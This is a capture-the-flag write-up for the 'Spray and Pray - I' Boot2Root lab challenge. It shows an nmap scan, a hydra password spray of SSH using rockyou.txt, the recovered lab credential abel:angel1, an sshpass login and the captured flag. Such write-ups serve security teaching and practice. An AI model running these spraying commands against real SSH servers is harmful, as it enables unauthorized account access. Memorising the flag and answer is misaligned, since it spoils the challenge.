N
Back to writeup archive
LIGA CTF 2026 (Week 2 Boot2Root)

Spray and Pray - I

Target exposed only SSH. The challenge hint says password was written under a "rock", which points directly to rockyou.txt. Username context in the challenge text gives abel as the credential spray target.

Boot2RootMarkdown + PDFEasysolved1 minread·186words
route
/TryN3rr0r/writeups/liga-ctf-2026-week-2-boot2root/spray-and-pray-i
archive index
2 / 16
read mode
parsed markdown
Writeup loaded.

Spray and Pray - I

challenge brief
target profile, scoring, and execution stack
verified solve
target
192.168.1.20
category
Boot2Root
points
350
difficulty
Easy
flag format
OWASPKL{xxx}
tools used
nmaphydrasshsshpass
final flag
OWASPKL{a2377c9ddd1837b32c82f4774a53e7a3}
reveal and copy from section 5
PDF evidence frame 01

1. Challenge Overview

Only SSH is open. Hint says the password is "under a rock" -> rockyou.txt. Known user abel. Spray SSH, log in, read local1.txt.

2. Initial Reconnaissance

2.1 Port scan

bash1 lines
1nmap -sC -sV -p- -T4 192.168.1.20 -oA spray1_nmap_full
bash2 lines
1PORT   STATE SERVICE VERSION222/tcp open  ssh     OpenSSH 10.2p1 Ubuntu 2ubuntu3.2 (Ubuntu Linux; protocol 2.0)
PDF evidence frame 02

3. Analysis / Forensics Path

3.1 Map the hint

SSH-only box + "under a rock" hint = rockyou.txt password spray against the known user abel.

4. Exploitation / Recovery

4.1 Spray SSH with rockyou

bash1 lines
1hydra -l abel -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.20
bash3 lines
1[DATA] attacking ssh://192.168.1.20:22/2[22][ssh] host: 192.168.1.20   login: abel   password: angel131 of 1 target successfully completed, 1 valid password found
PDF evidence frame 03

4.2 Log in, list the Desktop, and read the flag

bash1 lines
1sshpass -p 'angel1' ssh -o StrictHostKeyChecking=no abel@192.168.1.20 'id; hostname; ls -la /home/abel/Desktop; cat /home/abel/Desktop/local1.txt'
bash4 lines
1uid=1006(abel) gid=1006(abel) groups=1006(abel)2spraynpray3-rw-r--r-- 1 root root 42 May 23 20:01 local1.txt4OWASPKL{a2377c9ddd1837b32c82f4774a53e7a3}

> Re-validated live on 2026-05-31 via Kali (192.168.1.10): abel:angel1 logged in and returned the flag above.

PDF evidence frame 04

5. Flag

captured flag
OWASPKL{a2377c9ddd1837b32c82f4774a53e7a3}

6. Summary of Approach & Key Takeaways

nmap confirmed SSH-only.

Hint mapped to a rockyou spray.

hydra recovered abel:angel1.

SSH login read local1.txt.

On minimal-surface boxes the hint interpretation is the whole challenge.

SSH-only targets are almost always credential attacks.

PDF evidence frame 05
PDF evidence frame 06